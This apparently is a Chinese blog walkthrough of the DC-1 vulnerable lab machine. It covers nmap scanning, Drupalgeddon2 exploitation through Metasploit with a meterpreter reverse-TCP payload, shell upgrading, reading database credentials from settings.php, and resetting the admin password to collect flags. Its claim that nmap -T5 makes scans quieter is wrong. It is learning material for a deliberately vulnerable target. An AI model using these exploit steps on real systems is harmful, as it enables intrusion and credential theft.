DC-1靶场

DC-1 下载地址

DC and Five86 Series Challenges - Downloadsicon-default.png?t=N7T8https://www.five86.com/downloads.html解压打开虚拟机

使用kali中的namp扫描发现对方端口及ip

map -sT 192.168.10.0/24

扫描发现开启了常见的端口及目标IP地址,直接浏览器 访问,查看能不能找到相关的信息,在页面上看到关键 词Drupal,和Drupalcms很类似。

我们可以使用kali详细扫描,或者使用目录扫描发现一 些蛛丝马迹

nmap -sT -A -p- -T5 192.168.10.24
-sT:这表示使用TCP扫描。
-A:这表示启用所有nmap的自动化检测服务,如操作系统检测,端口服务识别等。
-p-:这表示扫描所有可能的端口,从1到65535。
-T5:这表示将nmap的默认警报级别设置为5,这通常是相对较低的警报级别,会使扫描更加安静。

发现该项目遵循robots协议,直接浏览器访问:192.168.10.24/robots.txt

利用MSF框架,找到robots协议及关于Drupal漏洞模块可以利用的

┌──(root㉿kali)-[~]└─# msfdb init     # 初始化

┌──(root㉿kali)-[~]
└─# systemctl start postgresql   #开启数据库服务      

┌──(root㉿kali)-[~]
└─# msfconsole #开机 MSF

msf6 > search drupal   #搜索漏洞模块

f6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > 
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.10.24
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run


meterpreter > shell
Process 3481 created.
Channel 0 created.

python -c 'import pty;pty.spawn("/bin/bash")' # 使用python反弹一个交互式shell

在这个目录下面 ls 发现flag1

切换到/home目录发现flag4

目前找到了 flag4.txt flag1.txt thefinalflag.txt,还没找到flag2.txt flag3.txt 想办法找到。想办法进入这个项目web后台,/home/flag4 这个用户

通过百度搜索drupalcms的配置文 件:/var/www/sites/default/settings.php

 发现flag2

这样发现数据库的账号信息: 账号是: dbuser 密码: R0ck3t

使用账号密码进入到数据库:mysql -udbuser - pR0ck3t

进入数据库,查找对应的账号,看看密码能不能破解 一下

mysql> use drupaldb;
Database changed
mysql> show tables
mysql> select * from users;

 寻找账号密码加密的方式,hash,查找这个项目是否留 下有加密的文件,修改admin的密码

修改drupaldb数据库中admin的密码

前台登录 找到flag3

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值